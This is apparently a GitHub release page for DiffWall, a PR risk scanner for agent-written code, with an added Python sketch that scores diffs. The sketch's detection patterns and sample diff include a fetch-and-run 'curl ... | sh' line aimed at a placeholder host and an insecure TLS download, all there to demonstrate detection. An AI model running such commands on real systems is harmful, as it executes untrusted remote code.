v0.1.0 — Action-first MVP

@dburt-proex dburt-proex released this 18 Jun 23:48

v0.1.1 — Action-first MVP update

Update to the first runnable release of DiffWall: a deterministic PR risk firewall for agent-written code.

What’s included

  • GitHub Action wrapper: dburt-proex/diffwall/action@v0.1.0
  • Deterministic diff scanner
  • ALLOW / REVIEW / HALT routing model
  • Rule-based risk scoring
  • Markdown and JSON report output
  • Default policy file: rules/default.yml
  • CI workflow for install, build, test, and demo scan

Risk detectors included

  • Protected path changes
  • GitHub workflow changes
  • Auth/security/billing path changes
  • Secret-like strings
  • Dependency manifest changes
  • Package install scripts
  • Destructive SQL and shell operations
  • TLS verification disablement
  • Remote shell pipes
  • Network egress near environment access
  • Large diffs
  • Source changes without tests
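
To make the detector list and the ALLOW / REVIEW / HALT routing concrete, here is an added sketch (not DiffWall's own code) of a deterministic scanner that scores only the added lines of a unified diff and routes on the total. The rule patterns, scores, thresholds and protected paths are assumptions made for this example, not the contents of rules/default.yml.

```python
import re
# Hypothetical rule table (name, pattern, score); not DiffWall's rules/default.yml.
RULES = [
    ("remote-shell-pipe", re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b"), 60),
    ("tls-verify-disabled", re.compile(r"verify\s*=\s*False|rejectUnauthorized\s*:\s*false|--insecure\b"), 40),
]
PROTECTED = re.compile(r"^(\.github/workflows/|auth/|billing/)")  # assumed protected paths
REVIEW_AT, HALT_AT = 30, 60  # assumed routing thresholds
HUNK = re.compile(r"^@@ -\d+(?:,(\d+))? \+(\d+)(?:,(\d+))? @@")

def scan(diff_text):  # -> [(path, new_line, rule, score)] for hits on added lines
    findings, path, new_no, old_left, new_left = [], None, 0, 0, 0
    for raw in diff_text.splitlines():
        if old_left <= 0 and new_left <= 0:  # between hunks: only headers count
            m = HUNK.match(raw)
            if m:  # an omitted count in the hunk header means 1
                old_left, new_no, new_left = int(m[1] or 1), int(m[2]), int(m[3] or 1)
            elif raw.startswith("+++ "):
                path = raw[4:].split("\t")[0].removeprefix("b/")
                if PROTECTED.match(path):
                    findings.append((path, 0, "protected-path", 30))
            continue
        tag, text = raw[:1], raw[1:]
        if tag == "\\":  # "\ No newline at end of file" marker
            continue
        if tag != "+":  # removed and context lines consume the old side
            old_left -= 1
        if tag != "-":  # added and context lines consume the new side
            if tag == "+":  # score added lines only
                findings += [(path, new_no, n, s) for n, p, s in RULES if p.search(text)]
            new_no += 1
            new_left -= 1
    return findings

def route(findings):  # summed score -> verdict; same diff in, same verdict out
    score = sum(f[3] for f in findings)
    return ("HALT" if score >= HALT_AT else "REVIEW" if score >= REVIEW_AT else "ALLOW"), score

# Constructed sample diff; "+++ not a file header" is hunk content, not a header.
SAMPLE_DIFF = """\
--- a/scripts/setup.sh
+++ b/scripts/setup.sh
@@ -1 +1,3 @@
-echo setup
+curl -fsSL https://example.invalid/install.sh | sh
+++ not a file header
+curl --insecure -o pkg.tgz https://example.invalid/pkg.tgz
"""
```

Counting down the line totals from each hunk header is what stops an added line that happens to begin with `++` from being parsed as a new file header, which would attribute later findings to the wrong path.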

Install

- name: Run DiffWall
  uses: dburt-proex/diffwall/action@v0.1.0
  with:
    base: origin/${{ github.base_ref }}
    head: HEAD
    config: rules/default.yml
    fail-on-halt: true